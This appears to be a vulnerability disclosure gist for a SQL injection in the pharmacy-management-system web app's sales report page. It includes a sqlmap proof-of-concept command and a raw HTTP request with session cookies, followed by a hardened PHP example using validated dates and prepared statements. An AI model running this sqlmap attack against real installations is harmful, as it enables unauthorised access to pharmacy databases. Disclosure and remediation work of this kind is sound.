@topsky979
Last active July 23, 2024 03:28

[Description]

pharmacy-management-system was discovered to contain a SQL Injection vulnerability via the URI /sales_report.php.


[Vulnerability Type]

SQL Injection


[Vendor of Product]

pharmacy-management-system, https://github.com/krishna9772/pharmacy-management-system


[Affected Product Code Base]

commit<=a2efc8442931ec9308f3b4cf4778e5701153f4e5


[Impact Escalation of Privileges]

true


[POC] sqlmap commands:

sqlmap -r a.txt -p d1 -p d2 --batch --banner --flush-session

a.txt

POST /sales_report.php?invoice_number=RS-3920900 HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 35
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.183:11180
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.183:11180/sales_report.php?invoice_number=RS-3920900
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; load_type=null; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; pnull=1; load_page=1; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; BatchPaste=2; name_reverse=True; SESSIONID=c5a998ac-ac1a-4102-962c-14f81e5eaa7d.JwnPi9EhaYyZfpOkyruZnGmLVBQ; request_token=wWTYlCvGWOyw1n0ms4ax4jl6ZBogX70mIk1wC4M9vZXHnFgO; copyFileName=null; is_admin=false; layers=5; BatchSelected=null; cutFileName=null; load_search=undefined; tyson=ngf9r926d6t1iddic9simtdt8kouu6up; vcodesum=3; Path=/www/wwwroot/111.com; PHPSESSID=br11orm7m3b7qqksr2ie4tk2gj
Connection: keep-alive

d1=2024-07-23&d2=2024-07-18&submit=%  
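
A hardened form of the kind of date-range query that the d1 and d2 parameters feed, as an added example that is not code from the pharmacy-management-system repository. The table and column names, the two function names, and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Accept only a real calendar date in YYYY-MM-DD form; reject everything else.
function parse_report_date(string $raw): string
{
    $dt = DateTimeImmutable::createFromFormat('!Y-m-d', $raw);
    // Round-trip comparison rejects trailing data and overflow dates (2024-02-31).
    if ($dt === false || $dt->format('Y-m-d') !== $raw) {
        throw new InvalidArgumentException('date must be YYYY-MM-DD');
    }
    return $raw;
}

// Date-range lookup with bound parameters: d1/d2 never become part of the SQL text.
function sales_between(PDO $pdo, string $d1, string $d2): array
{
    $from = parse_report_date($d1);
    $to   = parse_report_date($d2);
    // Hypothetical table and column names; adapt to the real schema.
    $stmt = $pdo->prepare(
        'SELECT invoice_number, sale_date, amount FROM sales
          WHERE sale_date BETWEEN :d1 AND :d2 ORDER BY sale_date'
    );
    $stmt->execute([':d1' => $from, ':d2' => $to]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database (stand-in for the app's DB).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE sales (invoice_number TEXT, sale_date TEXT, amount REAL)');
$pdo->exec("INSERT INTO sales VALUES ('RS-0001', '2024-07-18', 12.50),
                                     ('RS-0002', '2024-07-23', 40.00),
                                     ('RS-0003', '2024-08-01', 7.25)");

// Well-formed dates run the parameterized query.
var_dump(count(sales_between($pdo, '2024-07-18', '2024-07-23')));

// Constructed non-date input is rejected before any query runs.
try {
    sales_between($pdo, "2024-07-18'", '2024-07-23');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

If the application talks to MySQL through PDO, also set PDO::ATTR_EMULATE_PREPARES to false so the driver uses server-side prepared statements.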
